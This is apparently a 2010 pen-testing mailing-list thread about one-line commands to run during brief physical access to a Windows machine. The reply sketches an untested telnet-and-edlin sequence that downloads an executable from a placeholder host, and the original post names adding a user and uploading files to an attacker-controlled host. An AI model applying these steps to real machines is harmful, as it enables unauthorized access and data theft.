Adrian,

I haven't been able to make this work, but perhaps with some tweaking,
telnet and edlin can do it?

Something like:

telnet -f binary.exe
o site.com port
GET /path/to/binary.exe
quit

Then edlin binary.exe /B
1,3d
e

Note that edlin doesn't ship with 64-bit versions of Windows.

Josh

On Sun, Mar 14, 2010 at 2:10 PM, Adrian Crenshaw <[email protected]> wrote:
> Hi All,
>      I need some ideas. Let's way you are the Flash (or Quicksilver if you
> prefer Marvel comics), and could type uberfast. You have no storage device
> with you, but like I said, you can type really fast. If you had momentary
> access to a physical box (Windows or Linux, but I'm most interest in
> Widows), what command would you run as a pen-tester?
>
> Ideas to get us started:
> 1. Net user add obviously would be an option for some. (this I know the
> command for)
> 2. Anyone know a way to enter a binary at the command line and quickly run
> it?
> 3. Wget functionally in windows would be nice, then you could just grab exes
> you want quickly.
> 4. Quickly upload files off of the target system to someplace you control on
> the internet.
>
> Extra point for simple commands, quick to type, and on one line. If I use
> your idea, I'll be sure to thank you in the project notes/comments.
>
> Thanks,
> Adrian
>
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